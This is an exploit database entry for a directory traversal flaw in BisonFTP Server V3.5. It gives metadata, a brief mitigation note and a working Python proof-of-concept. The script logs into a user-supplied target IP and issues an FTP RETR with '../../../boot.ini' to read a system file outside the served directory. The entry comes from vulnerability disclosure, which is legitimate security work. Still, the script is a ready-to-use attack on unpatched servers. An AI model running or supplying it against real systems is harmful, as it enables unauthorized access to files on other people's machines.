BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability

vendor:

BisonFTP Server

by:

Jay Turla

7,5

CVSS

HIGH

Directory Traversal

CWE

Product Name: BisonFTP Server

Affected Version From: V3.5

Affected Version To: V3.5

Patch Exists: NO

Related CWE: N/A

CPE: a:bisonware:bisonftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Service Pack 3 - English

2020

BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability

BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC). An attacker can use the FTP protocol to traverse directories and retrieve files from the server, such as the boot.ini file.

Mitigation:

Ensure that the FTP server is configured to restrict access to only the necessary directories and files. Ensure that the FTP server is configured to use secure authentication methods such as SFTP or FTPS.

Source

Exploit-DB raw data:

#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) 

from ftplib import FTP

ftp = FTP(raw_input("Target IP: ")) 
ftp.login()                   
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"